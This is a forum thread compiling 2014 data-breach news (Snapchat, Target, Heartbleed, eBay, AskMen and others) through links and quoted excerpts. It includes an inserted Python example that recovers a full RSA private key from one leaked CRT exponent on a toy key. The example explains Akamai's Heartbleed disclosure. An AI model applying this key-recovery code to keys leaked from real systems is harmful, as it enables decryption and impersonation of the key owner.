View Full Version : Security breach/compromise - 2014

2014-01-02, 13:42

Snapchat leak - 4.6 million users ...
- http://bgr.com/2014/01/01/snapchat-leak-phone-numbers-usernames/
Jan 1, 2014 - "Snapchat users beware: someone has posted the phone numbers and usernames of more than 4.6 million accounts on the site SnapchatDB*, freely available as an SQL dump or CSV text file for anyone to download. The last two digits of each phone number have been censored “in order to minimize spam and abuse”... This giant leak comes just days after Gibson Security’s latest interview in which the company warns of Snapchat’s vulnerabilities. According to Gibson Security, the Snapchat team had taken far too long to address some very serious issues with the coding of the software, and had left the application wide open to exploits that could compromise user information... SnapchatDB claims that the database represents “a vast majority of the Snapchat users”... “This information was acquired through the recently patched Snapchat exploit and is being shared with the public to raise awareness on the issue,” says the owner of SnapchatDB. “The company was too reluctant at patching the exploit until they knew it was too late and companies that we trust with our information should be more careful when dealing with it.”
* UPDATE: SnapchatDB .info has been suspended and is no longer available.

- http://www.reuters.com/article/2013/12/31/us-apps-top-idUSBRE9BU0K820131231
Dec 31, 2013 - "Snapchat, Vine, and Candy Crush Saga earned coveted spots on smartphones this year, making them among the most downloaded apps of the year..."


2014-01-02, 13:59

Skype hacked to spread anti-MS messages
- http://www.theregister.co.uk/2014/01/02/skype_social_media_hacked_to_spread_antimicrosoft_messages/
2 Jan 2014 - "Entities claiming to represent the Syrian Electronic Army (SEA) have hacked Skype's social media presences and used them to post anti-Microsoft messages. Here's one of the defacements, from Skype's Twitter account.
- http://regmedia.co.uk/2014/01/02/skype_twitter_hack.png
... Skype's blog was also accessed and quickly became host to posts calling for Skype to stop allowing the NSA to access its back end... Skype wrestled control of its social media properties back from the alleged SEA members. The VoIP service has since posted the following all-clear to Twitter.
'You may have noticed our social media properties were targeted today. No user info was compromised. We’re sorry for the inconvenience. 8:13 PM - 1 Jan 2014'..."

- https://isc.sans.edu/diary.html?storyid=17330
Last Updated: 2014-01-01 23:00:26


2014-01-13, 13:24

Yahoo malware attack - greater than anticipated
- http://bgr.com/2014/01/13/yahoo-malware-attack/
Jan 13, 2014 - "The malware attack that took advantage of Yahoo’s Java-based ad network around Christmas Eve was far greater than anticipated, the company confirmed in a post*... on its help web pages. Initially believed to have affected only European users on January 3, 2014, the malware ad attacks were then said to have occurred during December 31, 2013 – January 3, 2014. But Yahoo on Friday revealed the attack actually took place between December 27, 2013 – January 3, 2014, and affected users -outside- of the European Union as well. It’s not clear how many users may have been affected by the hack..."
* http://help.yahoo.com/kb/index?locale=en_US&page=content&id=SLN22569
Jan 10th, 2014


2014-01-17, 00:06

Security firm IDs malware used in Target attack
- http://www.computerworld.com/s/article/9245491/Security_firm_IDs_malware_used_in_Target_attack
Jan 16, 2014 - "A security company that worked with the U.S. Secret Service to investigate the data breach at Target identified the malware used in the attack as a sophisticated derivative of a previously known Trojan program designed to steal data from Point-of-Sale (POS) systems. In a report released Thursday, iSight Partners identified the tool as Trojan.POSRAM, which it described as software that can find, store and transmit credit card and PIN numbers from POS systems. The Trojan is being used in a "persistent, wide ranging, and sophisticated" cyber campaign dubbed KAPTOXA targeting "many operators" of POS systems, the company warned. Some affected companies may not yet know they've been compromised or have already lost data, the iSight report noted... the POSRAM Trojan as a customized version of BlackPOS*, a piece of malware that has been available in the cyber underground since at least last February. Like BlackPOS, the POSRAM Trojan is designed to steal a card's magnetic stripe data while it is stored momentarily in a POS system's memory, just after a credit or debit card is swiped at the terminal. After infecting a POS terminal, the malware monitors the memory address spaces on the device for specific information. When it finds something of interest, the software saves the data to a local file and then transfers it to the attackers at preset times. It then is coded to delete the local file to cover its tracks... At the time the code was discovered, even fully updated antivirus tools would not have been able to detect the malware..."
* http://www.symantec.com/connect/forums/dump-memory-grabber-blackpos

Malware Targeting Point of Sale Systems
- https://www.us-cert.gov/ncas/alerts/TA14-002A
Jan 2, 2014

- http://www.isightpartners.com/2014/01/kaptoxa-pos-report-faq/
Jan. 16, 2014


2014-01-31, 13:57

'ChewBacca' hacks targeted retailers in 11 countries: RSA
- http://www.reuters.com/article/2014/01/31/us-retailers-cyberattack-idUSBREA0T21120140131
Jan 31, 2014 - "A cyber criminal ring targeting small retailers in 11 countries stole data on 49,000 payment cards using a malicious software known as "ChewBacca" before the operation was shut down... RSA FirstWatch disclosed the attacks on Thursday on its website. It said the firm's researchers uncovered the ring, whose victims included small companies in the United States, Russia, Canada and Australia. They managed to steal details from some 24 million payment card transactions over about two months, according to RSA... The findings from RSA show that the recent spate of attacks extend outside the United States. "The end game is to gain credit card information, so the hackers are going to go wherever it is easiest to get that information," said Will Gragido, senior manager with RSA FirstWatch, the threat research arm of RSA Security. He said his firm provided the FBI with data on the "ChewBacca" operation, including the location of a command-and-control server used by the hackers on Wednesday. That server was shut down on Thursday, according to Gragido... RSA said the hackers used a relatively new piece of malicious software known as -ChewBacca- designed to infect computers such as the point-of-sales systems that process credit card transactions."

- https://blogs.rsa.com/rsa-uncovers-new-pos-malware-operation-stealing-payment-card-personal-information/
Jan 30, 2014

- https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware

Yahoo reports breach of some user accounts
- http://www.cnbc.com/id/101378748
30 Jan 2014 | 5:33 PM ET - "Yahoo reported on Thursday that some of its users' e-mail accounts may have been targeted in a security breach of a third-party database... The company notified users that may have been affected to reset their passwords. It has also implemented a second sign-in verification to allow users to re-secure their accounts..."

- http://www.reuters.com/article/2014/01/31/us-yahoo-hack-idUSBREA0T21H20140131
Jan 30, 2014

- https://isc.sans.edu/diary.html?storyid=17543
Last Updated: 2014-01-31 00:43:22 UTC

- http://yahoo.tumblr.com/post/75083532312/important-security-update-for-yahoo-mail-users

- https://help.yahoo.com/kb/SLN2080.html

Password Re-Use is the Problem...
- http://garwarner.blogspot.com/2014/01/yahoo-reveals-coordinated-attack-on.html
Jan 31, 2014


2014-02-19, 18:27

Over 1 Million Emails and Passwords Exposed ...
- https://www.trusteer.com/blog/the-sea-strikes-again-over-1-million-emails-and-passwords-exposed
Feb 19, 2014 - "The latest media outlet targeted by the Syrian Electronic Army (SEA) is Forbes .com. The hacktivist group was able to breach a database containing email address and password combinations for over a million user accounts, including Forbes contributors. Although the passwords were one-way encrypted, the media outlet recommended users change their passwords. To prove that it carried out the attack and breached the database, the SEA defaced three online articles. It seems that attackers and cybercriminals are increasingly targeting users’ login credentials, which will provide them access to various systems. Only two weeks ago we learned that Yahoo’s email system was breached using credentials stolen from a third party... With login credentials to the user’s account, it is possible to access information stored within the user's account. It is not known what type of information Forbes .com stored about its users. The concern would be exposure of personal and financial data. Credentials to contributors' accounts may actually provide access to systems used by the media outlet to publish news, allowing attackers to post fake news alerts... Users should change their login passwords and avoid reusing password across multiple websites and applications. Organizations should educate employees about the risk in re-using passwords for logging into multiple applications..."

- http://www.databreaches.net/syrian-electronic-army-hacks-forbes-steals-and-dumps-employee-and-user-data/
Feb 15, 2014


2014-03-14, 12:20

Target failed to act on early alert ...
- http://www.reuters.com/article/2014/03/13/us-target-breach-idUSBREA2C14F20140313
Mar 13, 2014 - "Target Corp's security software detected potentially malicious activity during last year's massive data breach, but its staff decided -not- to take immediate action... The disclosure came after Bloomberg Businessweek* reported on Thursday that Target's security team in Bangalore had received alerts from a FireEye Inc security system on November 30 after the attack was launched and sent them to Target headquarters in Minneapolis... The FireEye reports indicated malicious software had appeared in the system... The alert from FireEye labeled the threat with the generic name "malware.binary"... experts said that they believed it was likely that Target's security team received hundreds of such alerts on a daily basis, which would have made it tough to have singled out that threat as being particularly malicious..."
* http://www.businessweek.com/articles/2014-03-13/target-missed-alarms-in-epic-hack-of-credit-card-data
Mar 13, 2014 - "... On Saturday, Nov. 30, the hackers had set their traps and had just one thing to do before starting the attack: plan the data’s escape route. As they uploaded exfiltration malware to move stolen credit card numbers — first to staging points spread around the U.S. to cover their tracks, then into their computers in Russia — FireEye spotted them. Bangalore got an alert and flagged the security team in Minneapolis. And then …
Nothing happened.
For some reason, Minneapolis didn’t react to the sirens. Bloomberg Businessweek spoke to more than 10 former Target employees familiar with the company’s data security operation, as well as eight people with specific knowledge of the hack and its aftermath, including former employees, security researchers, and law enforcement officials. The story they tell is of an alert system, installed to protect the bond between retailer and customer, that worked beautifully. But then, Target stood by as 40 million credit card numbers — and 70 million addresses, phone numbers, and other pieces of personal information — gushed out of its mainframes..."


2014-04-14, 16:20

Canada taxpayer data stolen in Heartbleed breach
- http://www.reuters.com/article/2014/04/14/us-canada-tax-heartbleed-idUSBREA3D0XZ20140414
Apr 14, 2014 - "Canada's tax-collection agency reported on Monday that the private information of some 900 people had been stolen from its computer systems as a result of vulnerabilities caused by the 'Heartbleed' bug. The breach allowed someone to extract social insurance numbers, which are used for employment and gaining access to government benefits, and possibly some other data, the Canada Revenue Agency said... Police are investigating and the country's privacy commissioner has been informed, it said. Right in the heart of tax-filing season, the CRA shut down access to its online services last Wednesday because of the bug, which is found in widely used Web encryption technology..."

Canadian charged in 'Heartbleed' attack on tax agency
- http://www.reuters.com/article/2014/04/16/us-cybersecurity-heartbleed-arrest-idUSBREA3F1KS20140416
Apr 16, 2014 - "Canadian police have arrested a 19-year-old man and charged him in connection with exploiting the "Heartbleed" bug to steal taxpayer data from a government website, the Royal Canadian Mounted Police (RCMP) said on Wednesday. In what appeared to be the first report of an attack using a flaw in software known as OpenSSL, the Canada Revenue Agency (CRA) said this week that about 900 social insurance numbers and possibly other data had been compromised as a result of an attack on its site. The suspect, Stephen Solis-Reyes, was arrested at his home in London, Ontario on Wednesday and faces criminal charges of unauthorized use of computer and mischief in relation to data... Police seized Solis-Reyes' computer equipment and scheduled his court appearance for July 17, 2014..."

- https://blogs.akamai.com/2014/04/heartbleed-update-v3.html
April 13, 2014 7:20 PM - "Over the weekend, an independent security researcher contacted Akamai about some defects in the software we use for memory allocation around SSL keys. We discussed Friday how we believed this had provided our SSL keys with protection against Heartbleed and had contributed the code back to the community. The code that we had contributed back was, as we noted, not a full patch, but would be a starting point for improving the openssl codebase. In short: we had a bug. An RSA key has 6 critical values; our code would only attempt to protect 3 parts of the secret key, but does not protect 3 others. In particular, we only try to protect d, p, and q, but not d mod (p-1), d mod (q-1), or q^{-1} mod p. These intermediate extra values (the Chinese Remainder Theorem, or CRT, values) are calculated at key-generation time as a performance improvement. As the CRT values were not stored in the secure memory area, the possibility exists that these critical values for the SSL keys could have been exposed to an adversary exploiting the Heartbleed vulnerability. Given any CRT value, it is possible to calculate all 6 critical values. As a result, we have begun the process of rotating all customer SSL keys/certificates. Some of these certificates will quickly rotate; some require extra validation with the certificate authorities and may take longer. In parallel, we are evaluating the other claims made by the researcher, to understand what actions we can take to improve our customer protection."

- https://blogs.akamai.com/2014/04/heartbleed-a-history.html
April 16, 2014 - "In the interest of providing an update to the community on Akamai's work to address issues around the Heartbleed vulnerability, we've put together this outline as a brief summary:
• Akamai, like all users of OpenSSL, was vulnerable to Heartbleed.
• Akamai disabled TLS heartbeat functionality before the Heartbleed vulnerability was publicly disclosed.
• In addition, Akamai went on to evaluate whether Akamai's unique secure memory arena may have provided SSL key protection during the vulnerability window when we had been vulnerable; it would not have.
• Akamai is reissuing customer SSL certificates, due to the original Heartbleed vulnerability...
We are currently reviewing a revised version of our secure memory arena with some external researchers and developers. Once we are more confident that it more closely achieves its goals, we will contribute this code to the community. We also plan to evaluate how we can better collaborate and support the open source community."
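The Akamai post above says that any one leaked CRT value lets an adversary rebuild all six private values, which is why protecting only d, p and q was not enough. The example below is added here (it is my own illustration, not Akamai's or OpenSSL's code) and shows the mechanism for the two CRT exponents d mod (p-1) and d mod (q-1) on a constructed toy key built from two Mersenne primes; the q^{-1} mod p case is not shown.

```python
"""
Why the RSA CRT values need the same protection as d, p and q.

A CRT-optimised RSA private key stores dp = d mod (p-1), dq = d mod (q-1)
and qinv = q^-1 mod p next to d, p and q. Given the public key (n, e),
which anyone can read from the certificate, a leaked dp or dq alone is
enough to factor n and rebuild every private value. (Added example.)
"""
from math import gcd

# Constructed demo key: two Mersenne primes, far too small for real use.
P = (1 << 61) - 1
Q = (1 << 89) - 1
E = 65537


def make_key(p, q, e):
    """Return the six private values of a CRT RSA key together with n and e."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return {
        "n": n, "e": e, "d": d, "p": p, "q": q,
        "dp": d % (p - 1),
        "dq": d % (q - 1),
        "qinv": pow(q, -1, p),
    }


def factor_from_crt_exponent(n, e, crt_exp, first_probe=2):
    """Recover one prime factor of n from dp or dq.

    Because e*dp == 1 (mod p-1), Fermat's little theorem gives
    m^(e*dp) == m (mod p) for any m not divisible by p, so p divides
    m^(e*dp) - m while q almost never does. gcd(m^(e*dp) - m, n) is
    therefore p. The identical argument with dq yields q.
    """
    # A few probes guard against the rare m whose order also divides e*crt_exp mod (q-1).
    for m in range(first_probe, first_probe + 16):
        f = gcd(pow(m, e * crt_exp, n) - m, n)
        if 1 < f < n:
            return f
    raise ValueError("no factor found; value is not a CRT exponent for this n")


def rebuild_key(n, e, crt_exp):
    """Rebuild all six private values from (n, e) and a single CRT exponent."""
    f = factor_from_crt_exponent(n, e, crt_exp)
    # Which factor is called p is only a naming convention; every value
    # follows from the factorisation. Sorting matches make_key(P, Q, E).
    p, q = sorted((f, n // f))
    return make_key(p, q, e)


def crt_decrypt(key, c):
    """Standard CRT (Garner) decryption, used to prove the rebuilt key works."""
    m1 = pow(c, key["dp"], key["p"])
    m2 = pow(c, key["dq"], key["q"])
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


def demo():
    key = make_key(P, Q, E)
    n, e = key["n"], key["e"]
    message = 0x48656C6C6F  # constructed plaintext, "Hello" as an integer
    c = pow(message, e, n)
    # Scenario from the post: only the CRT values sat outside the protected arena.
    rebuilt = rebuild_key(n, e, key["dp"])
    assert rebuilt == key and crt_decrypt(rebuilt, c) == message
    assert rebuild_key(n, e, key["dq"]) == key  # the other exponent is as bad
    return rebuilt


if __name__ == "__main__":
    k = demo()
    print("recovered p from dp alone:", k["p"])
```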


2014-05-05, 14:52

Verizon 2014 Data Breach Investigations Report
- http://www.verizonenterprise.com/DBIR/
"The 2014 Data Breach Investigations Report (DBIR) casts new light on threats — taking 10 years of forensic data and finding that 92% of these can be categorized into nine basic attack patterns. This approach also helps identify primary threats to your industry, which you can analyze to reinforce your defenses."

- http://www.verizonenterprise.com/DBIR/2014/insider/

- http://www.verizonenterprise.com/resources/infographics/ig_Verizon-DBIR-2014_en_xg.pdf


2014-05-09, 19:09

Bitly: Regarding Your Account ...
- http://blog.bitly.com/post/85169217199/urgent-security-update-regarding-your-bitly-account
UPDATE #4 - MAY 11 at 11:33AM EDT: We are sending an email to all users from the domain bitlysupport .com outlining the steps to secure your account. If you have already followed the steps to secure your account, you do not need to do so again.
UPDATE #3 - MAY 9 at 2:45PM EDT: We have updated this post to address questions regarding the Bitly iPhone app.
UPDATE #2 - MAY 9 at 10:25AM EDT: "We have updated this post to explain what specifically was compromised and we’re encouraging all of our users to secure their Bitly accounts by following the recommendations listed below."
UPDATE #1 - MAY 8 at 8:32PM EDT: "We have updated the section of this post regarding users who have Twitter or Facebook accounts connected to their Bitly accounts.
We have reason to believe that Bitly account credentials have been compromised; specifically, users’ email addresses, encrypted passwords, API keys and OAuth tokens. We have no indication at this time that any accounts have been accessed without permission. We have taken steps to ensure the security of all accounts, including disconnecting all users’ Facebook and Twitter accounts..."

OAuth, OpenID Security Issues Could Leak Data, Redirect Users
- http://atlas.arbor.net/briefs/index#-527940361
Elevated Severity
9 May 2014

- http://www.databreaches.net/urgent-security-update-regarding-your-bitly-account/
May 8, 2014


2014-05-21, 17:14

eBay to ask users to Change Passwords ...
- http://www.ebayinc.com/in_the_news/story/ebay-inc-ask-ebay-users-change-passwords
5.21.2014 - "eBay Inc. (Nasdaq: EBAY) said beginning later today it will be asking eBay users to change their passwords because of a cyberattack that compromised a database containing encrypted passwords and other non-financial data. After conducting extensive tests on its networks, the company said it has no evidence of the compromise resulting in unauthorized activity for eBay users, and no evidence of any unauthorized access to financial or credit card information, which is stored separately in encrypted formats. However, changing passwords is a best practice and will help enhance security for eBay users... Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay's corporate network, the company said. Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers.
The database, which was compromised between late February and early March, included eBay customers’ name, encrypted password, email address, physical address, phone number and date of birth. However, the database did not contain financial information or other confidential personal information. The company said that the compromised employee log-in credentials were first detected about two weeks ago. Extensive forensics subsequently identified the compromised eBay database, resulting in the company’s announcement today. The company said it has seen no indication of increased fraudulent account activity on eBay. The company also said it has no evidence of unauthorized access or compromises to personal or financial information for PayPal users. PayPal data is stored separately on a secure network, and all PayPal financial information is encrypted. Beginning later today, eBay users will be notified via email, site communications and other marketing channels to change their password. In addition to asking users to change their eBay password, the company said it also is encouraging any eBay user who utilized the same password on other sites to change those passwords, too. The same password should never be used across multiple sites or accounts..."

- http://atlas.arbor.net/briefs/
High Severity
May 29, 2014
Analysis: Attackers were able to access customers' names, email addresses, encrypted passwords, and more. Attackers stole employee credentials to access the corporate network, though eBay has not stated how that was accomplished.
Source: http://www.forbes.com/sites/jameslyne/2014/05/21/ebay-hacked-bleeds-data-why-you-need-to-act
Since confirmation of the data breach, another security flaw has been discovered in eBay's website: an XSS (cross-site scripting) vulnerability could be used to inject attack code and grab cookies from logged-in users.
Sources: https://cehsecurity.com/ebay-cross-site-scripting-xssxml-code/
- http://www.pcworld.com/article/2159400/ebay-flaw-could-be-used-to-hijack-accounts-researcher-says.html
eBay users should change their passwords immediately, as well as any websites where the password may have been reused. However, the same password should not be used across different sites, as ramifications of one site's compromise could affect other sensitive user accounts.


2014-05-27, 15:04

Avast takes down forums after breach hits 400,000 users
User names, email addresses and hashed passwords were compromised
- http://www.theinquirer.net/inquirer/news/2346752/avast-takes-down-forums-after-breach-hits-400-000-users
May 27 2014

- https://blog.avast.com/2014/05/26/avast-forum-offline-due-to-attack/
May 26, 2014 - "The AVAST forum is currently offline and will remain so for a brief period. It was hacked over this past weekend and user nicknames, user names, email addresses and hashed (one-way encrypted) passwords were compromised. Even though the passwords were hashed, it could be possible for a sophisticated thief to derive many of the passwords. If you use the same password and user names to log into any other sites, please change those passwords immediately. Once our forum is back online, all users will be required to set new passwords as the compromised passwords will no longer work... We are now rebuilding the forum and moving it to a different software platform. When it returns, it will be faster and more secure. This forum for many years has been hosted on a third-party software platform and how the attacker breached the forum is not yet known. However, we do believe that the attack just occurred and we detected it essentially immediately. We realize that it is serious to have these usernames stolen and regret the concern and inconvenience it causes you. However, this is an isolated third-party system and your sensitive data remains secure.
Vince Steckler
CEO AVAST Software"

- http://www.databreaches.net/avast-takes-community-forum-offline-after-data-breach/
May 26, 2014

Spotify - Important Notice to Our Users
- http://news.spotify.com/us/2014/05/27/important-notice-to-our-users/
May 27, 2014 Oskar Stål, CTO - "We’ve become aware of some -unauthorized- access to our systems and internal company data and we wanted to let you know the steps we’re taking in response. As soon as we were aware of this issue we immediately launched an investigation. Information security and data protection are of great importance to us at Spotify and that is why I’m posting today. Our evidence shows that only one Spotify user’s data has been accessed and this did not include any password, financial or payment information. We have contacted this one individual. Based on our findings, we are not aware of any increased risk to users as a result of this incident. We take these matters very seriously and as a general precaution will be asking certain Spotify users to re-enter their username and password to log in over the coming days. As an extra safety step, we are going to guide Android app users to upgrade over the next few days**. If Spotify prompts you for an upgrade, please follow the instructions. As always, Spotify does not recommend installing Android applications from anywhere other than Google Play, Amazon Appstore or https://m.spotify.com/. At this time there is no action recommended for iOS and Windows Phone users. Please note that offline playlists will have to be re-downloaded in the new version. We apologise for any inconvenience this causes, but hope you understand that this is a necessary precaution to safeguard the quality of our service and protect our users. We have taken steps to strengthen our security systems in general and help protect you and your data – and we will continue to do so. We will be taking further actions in the coming days to increase security for our users. Please click here* to read more."
* https://support.spotify.com/problems/#!/article/downloading-android-update

** https://play.google.com/store/apps/details?id=com.spotify.mobile.android.ui
May 28, 2014


2014-06-05, 13:44

SKorea databases hacked ...
- https://news.yahoo.com/us-general-says-skorea-databases-hacked-074734037.html
Jun 5, 2014 - "The top U.S. military official in South Korea said a hacking incident might have compromised the personal information of thousands of South Koreans employed by the American command. Gen. Curtis M. Scaparrotti, commander of U.S. Forces in South Korea, apologized Thursday for the "possible theft" from two databases of private details of South Koreans such as names, contact information and work history. About 16,000 current and former workers, almost all of them Korean nationals, and people who have sought jobs with the U.S. military in South Korea, are affected by the incident. The U.S. military said no classified military data was compromised as the databases were on a separate network. South Korean government, broadcasting and finance industry networks have been a frequent target of cyberattacks in the past. Some have been blamed on North Korea, which denies any involvement. Others have been attributed to hackers seeking to profit from data theft... U.S. Forces spokesman Christopher Bush said an investigation by the U.S. Army was underway to determine who was responsible. The U.S. has around 28,500 soldiers in South Korea as a deterrent against the North..."

- https://www.computerworld.com/s/article/9248887/U.S._Army_warns_of_database_breaches_in_South_Korea
June 6, 2014


2014-06-07, 01:57

Security incident on forum.eset.com
- https://forum.eset.com/topic/2590-security-incident-on-forumesetcom/
June 5, 2014 - "We have been informed by our third-party forum provider that user login details of ESET Security Forum members have been compromised. At this time we have confirmed that login data (user name/email and hashed forum passwords) have been accessed. We have requested details about the incident from our provider and have launched a full-scale investigation with them. ESET Security Forum has around 2,700 registered users and the only information stored are login details: no financial or other sensitive data are affected. ESET-operated infrastructure and ESET software users were not affected in any way by this incident. We recommend that all ESET Security Forum users change their passwords. Having different passwords for different services is a good practice: if you used your ESET Security Forum password for other services, we recommend that you also change those passwords immediately too... We apologize for any inconvenience.
ESET Security Forum"


2014-06-11, 00:35

Credit Card Breach at P.F. Chang
- http://krebsonsecurity.com/2014/06/banks-credit-card-breach-at-p-f-changs/
June 10, 2014 - "Nationwide chain P.F. Chang’s China Bistro said today that it is investigating claims of a data breach involving credit and debit card data reportedly stolen from restaurant locations nationwide. On June 9, thousands of newly-stolen credit and debit cards went up for sale on rescator[dot]so, an underground store best known for selling tens of millions of cards stolen in the Target breach. Several banks contacted by KrebsOnSecurity said they acquired from this new batch multiple cards that were previously issued to customers, and found that all had been used at P.F. Chang’s locations between the beginning of March 2014 and May 19, 2014... Contacted about the banks’ claims, the Scottsdale, Arizona-based restaurant chain said it has not yet been able to confirm a card breach, but that the company “has been in communications with law enforcement authorities and banks to investigate the source”... Banks contacted for this story reported cards apparently stolen from PFC locations in Florida, Maryland, New Jersey, Pennsylvania, Nevada and North Carolina. The new batch of stolen cards, dubbed “Ronald Reagan” by the card shop’s owner, is the first major glut of cards released for sale on the fraud shop since March 2014, when curators of the crime store advertised the sale of some 282,000 cards stolen from nationwide beauty store chain Sally Beauty. The items for sale are not cards, per se, but instead data copied from the magnetic stripe on the backs of credit cards. Armed with this information, thieves can re-encode the data onto new plastic and then use the counterfeit cards to buy high-priced items at big box stores, goods that can be quickly resold for cash (think iPads and gift cards, for example). The most common way that thieves steal this type of card data is by hacking into cash registers at retail locations and planting malicious software that surreptitiously records mag stripe data when cards are swiped through the machines. 
The breaches at Target, Neiman Marcus, Michaels and Sally Beauty all were powered by malware that thieves planted on point-of-sale systems..."

- http://pfchangs.com/security/
June 12, 2014 - "On Tuesday, June 10, P.F. Chang's learned of a security compromise that involves credit and debit card data reportedly stolen from some of our restaurants. Immediately, we initiated an investigation with the United States Secret Service and a team of third-party forensics experts to understand the nature and scope of the incident, and while the investigation is still ongoing, we have concluded that data has been compromised. At P.F. Chang's, the safety and security of our guests' payment information is a top priority. Therefore, we have moved to a manual credit card imprinting system for all P.F. Chang's China Bistro branded restaurants located in the continental United States. This ensures our guests can still use their credit and debit cards safely in our restaurants as our investigation continues. We have also established a dedicated public website, pfchangs.com/security, for guests to receive updates and answers to their questions. Because we are still in the preliminary stages of our investigation, we encourage our guests to be vigilant about checking their credit card and bank statements. Any suspected fraudulent activity should be immediately reported to their card company. We sincerely regret the inconvenience and concern this may cause for our guests."


2014-06-24, 03:30

AskMen site compromised to serve malicious code
- http://community.websense.com/blogs/securitylabs/archive/2014/06/23/the-official-website-of-askmen-is-compromised-to-serve-malicious-code.aspx
23 Jun 2014 - "... the official website of AskMen (at www .askmen .com ), a popular free online men's web portal, has been compromised and injected with malicious code that appears to be part of a mass-injection attack. According to similarweb.com, AskMen's website has more than 10 million visitors each month. The injected code redirects a user to a website serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs has contacted the host master of askmen .com with a notification regarding the compromise. No response or acknowledgement has been received so far.
AskMen's main page as of 23 June 2014:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0574.1.png
SimilarWeb .com statistics for AskMen:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8233.askmen_5F00_similarweb_5F00_2.jpg
... Analysis: The injected code has been found in multiple locations within the main website as well as in localized versions of it, like au.askmen .com. When a user browses to the main website, the injected code loads automatically and silently redirects the user to a website serving the actual exploit code...
Java exploit:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6746.8.png
Nuclear Pack Exploit Kit: The exploit page displays similar obfuscation techniques, which are often used in the Nuclear Pack exploit kit. In addition, the above mentioned Java exploit is most often used by Nuclear Pack. These facts strongly indicate that the attacker is using either the Nuclear Pack exploit kit or a variant of it...
Conclusion: ... even very popular websites are not immune to malicious code injection attacks. An attack of this scale can potentially infect tens of thousands of unsuspecting users due to the nature of the attack and the high popularity of the website."

- https://www.computerworld.com/s/article/9249318/AskMen.com_website_redirects_to_Caphaw_malware_WebSense_says
June 23, 2014 - "... The domains hosting the exploit code are constantly changing... The injected JavaScript code takes the current date and then uses an algorithm to hash that data, which generates a domain name where the hackers have hosted the exploit kit. A new attack domain is generated every day... the Nuclear Pack tries exploits for either outdated Java or Adobe Systems' Reader software... If the attack is successful, a malicious software called "Caphaw" is installed..."

- http://sitecheck.sucuri.net/results/askmen.com
Status: Site Potentially Harmful. Immediate Action is Required.
Web Trust: Blacklisted (9 Blacklists Checked) ...
IP address:
System Details:
Running on: Apache/2.2.21
System info: (Unix) PHP/5.3.19
Powered by: PHP/5.3.19
Outdated Web Server Apache Found: Apache/2.2.21...

- https://www.apache.org/dist/httpd/CHANGES_2.2.27
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0098 - 5.0
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6438 - 5.0


2014-06-25, 12:35

Montana state site hacked - over 1 million exposed
- http://www.dphhs.mt.gov/newsevents/newsreleases2014/june/identityprotection%20.shtml
June 24, 2014 - "State of Montana officials said today that 1.3 million people will be notified regarding the incident where hackers gained entry to a Department of Public Health and Human Services (DPHHS) computer server, though officials said there is no knowledge that information on the server was used inappropriately, or was even accessed. The state is notifying individuals whose personal information was on the server, consistent with state and federal laws. The notification list includes both current and former Montana residents, and in some instances, the estates of deceased individuals. Officials announced that the state is also notifying individuals of free credit monitoring and identity protection insurance... On May 22nd, an independent forensic investigation determined a DPHHS computer server had been hacked. The forensic investigation was ordered on May 15th when suspicious activity was first detected by DPHHS officials. When the suspicious activity was discovered, agency officials immediately shut down the server and contacted law enforcement... The state has taken several steps to further strengthen security, including safely restoring all systems affected, adding additional security software to better protect sensitive information on existing servers, and continually reviewing its security practices to ensure all appropriate measures are being taken to protect citizen information."

:fear::fear: :mad:

2014-07-19, 04:54

AskMen .com compromised again
- http://blog.malwarebytes.org/exploits-2/2014/07/askmen-com-compromised-again/
July 18, 2014 - "Last month, security firm Websense reported that popular website AskMen .com was compromised to serve malicious code. Today, our honeypot captured an attack coming from AskMen .com in what appears to have been malicious code injected in their server... an iframe (injection)... is what is used to do a -redirection- to a malicious site... a landing page for the Nuclear EK:
- Flash exploit: https://www.virustotal.com/en/file/97d7e3975fd7d0982c6d6092a3ca74cc9224369ffecff230c8eb02bb4a34d0fa/analysis/
- PDF exploit: https://www.virustotal.com/en/file/05efd8d19e9bcaf810171357024307a812ba6966464e3c5d3b54720900480646/analysis/1405699036/
- Java exploit: https://www.virustotal.com/en/file/0b1a173172a1fde75b5ed957667c3fdf3a168715c210895eed58e9c500573239/analysis/
Finally the following payload is dropped and executed:
- https://www.virustotal.com/en/file/d1c42ba5eb3dfe8ac861172b755e7779aa33811debfdccc6c2f16c956879955a/analysis/1405699015/
... Our free Malwarebytes Anti-Exploit* blocked this threat:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/blocked.png
We notified AskMen .com and they promptly replied that they were looking into the matter immediately..."
(More detail at the first malwarebytes URL of this post.)
* http://www.malwarebytes.org/antiexploit/


2014-07-24, 17:07

ECB says website hacked, no sensitive data affected
- http://www.reuters.com/article/2014/07/24/us-ecb-cybercrime-idUSKBN0FT1D620140724
July 24, 2014 - "The European Central Bank said on Thursday its website had been hacked and some email addresses and other contact information stolen but insisted no market-sensitive data were affected. The theft came to light after the central bank received an anonymous email on Monday night demanding money in exchange for the stolen addresses. The hackers broke into a database storing details of people who had registered for ECB conferences, visits and other events, the bank said. That database, which held about 20,000 email addresses and a much smaller number of postal addresses and phone numbers, was kept physically separate from internal systems, it added. "No internal systems or market sensitive data were compromised," the ECB said in a statement. The ECB is currently running a particularly sensitive review of the euro zone's top lenders, collecting streams of data to gauge whether banks have valued loans and other assets correctly, before it starts supervising them. German police were investigating the breach and all people who might have had their details stolen had been contacted, said the bank."
- https://www.ecb.europa.eu/press/pr/date/2014/html/pr140724.en.html
24 July 2014

Philippine gov't site infected with Spam Code
- http://blog.malwarebytes.org/hacking-2/2014/07/philippine-government-site-infected-with-spam-code/
